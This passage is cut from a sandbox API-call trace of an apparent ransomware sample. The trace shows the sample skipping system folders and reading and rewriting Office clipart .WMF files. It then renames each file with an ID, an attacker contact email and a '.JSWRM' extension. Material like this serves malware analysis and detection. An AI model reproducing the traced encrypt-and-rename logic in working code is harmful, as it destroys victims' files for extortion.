office\\root\\clipart\\pub60cor\\j0102594.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2475b0 | out: hHeap=0x1e0000) returned 1 [0080.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0080.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0080.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bd0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0102762.WMF", cAlternateFileName="")) returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2=".") returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="..") returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="...") returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="windows") returned -1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="recovery") returned -1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="perflogs") returned -1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="documents and settings") returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="system volume information") returned -1 [0080.508] lstrcmpiW (lpString1="J0102762.WMF", lpString2="msocache") returned -1 [0080.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0080.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102762.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102762.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102762.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0080.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0080.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102762.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102762.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102762.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0080.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.509] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0080.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.509] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11216) returned 1 [0080.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bd0) returned 0x24d210 [0080.509] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2bd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2bd0, lpOverlapped=0x0) returned 1 [0080.511] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.511] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2bd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2bd0, lpOverlapped=0x0) returned 1 [0080.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.511] CloseHandle (hObject=0x314) returned 1 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0080.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0080.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0080.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0080.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0080.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.512] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.513] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4290, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0102984.WMF", cAlternateFileName="")) returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2=".") returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="..") returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="...") returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="windows") returned -1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="recovery") returned -1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="perflogs") returned -1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="documents and settings") returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="system volume information") returned -1 [0080.513] lstrcmpiW (lpString1="J0102984.WMF", lpString2="msocache") returned -1 [0080.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102984.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102984.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102984.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102984.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0102984.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0102984.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0080.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.513] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.513] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.513] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.514] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17040) returned 1 [0080.514] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.514] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4290) returned 0x24d210 [0080.514] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4290, lpOverlapped=0x0) returned 1 [0080.561] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.561] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4290, lpOverlapped=0x0) returned 1 [0080.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.561] CloseHandle (hObject=0x314) returned 1 [0080.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0080.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0080.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0080.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0080.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0080.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.563] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe605048, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe605048, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x43c0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0103058.WMF", cAlternateFileName="")) returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2=".") returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="..") returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="...") returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="windows") returned -1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="recovery") returned -1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="perflogs") returned -1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="documents and settings") returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="system volume information") returned -1 [0080.563] lstrcmpiW (lpString1="J0103058.WMF", lpString2="msocache") returned -1 [0080.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103058.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103058.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103058.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0080.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103058.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103058.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0103058.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0080.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0080.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.564] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17344) returned 1 [0080.564] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.564] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x43c0) returned 0x24d210 [0080.564] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x43c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x43c0, lpOverlapped=0x0) returned 1 [0080.567] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.567] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x43c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x43c0, lpOverlapped=0x0) returned 1 [0080.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.567] CloseHandle (hObject=0x314) returned 1 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0080.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0080.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0080.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0080.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.567] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0080.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0080.568] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe5dee50, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe5dee50, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe605048, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3264, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0103262.WMF", cAlternateFileName="")) returned 1 [0080.568] lstrcmpiW (lpString1="J0103262.WMF", lpString2=".") returned 1 [0080.568] lstrcmpiW (lpString1="J0103262.WMF", lpString2="..") returned 1 [0080.568] lstrcmpiW (lpString1="J0103262.WMF", lpString2="...") returned 1 [0080.568] lstrcmpiW (lpString1="J0103262.WMF", lpString2="windows") returned -1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="recovery") returned -1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="perflogs") returned -1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="documents and settings") returned 1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="system volume information") returned -1 [0080.569] lstrcmpiW (lpString1="J0103262.WMF", lpString2="msocache") returned -1 [0080.569] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103262.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.569] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0103262.WMF", cchWideChar=12, 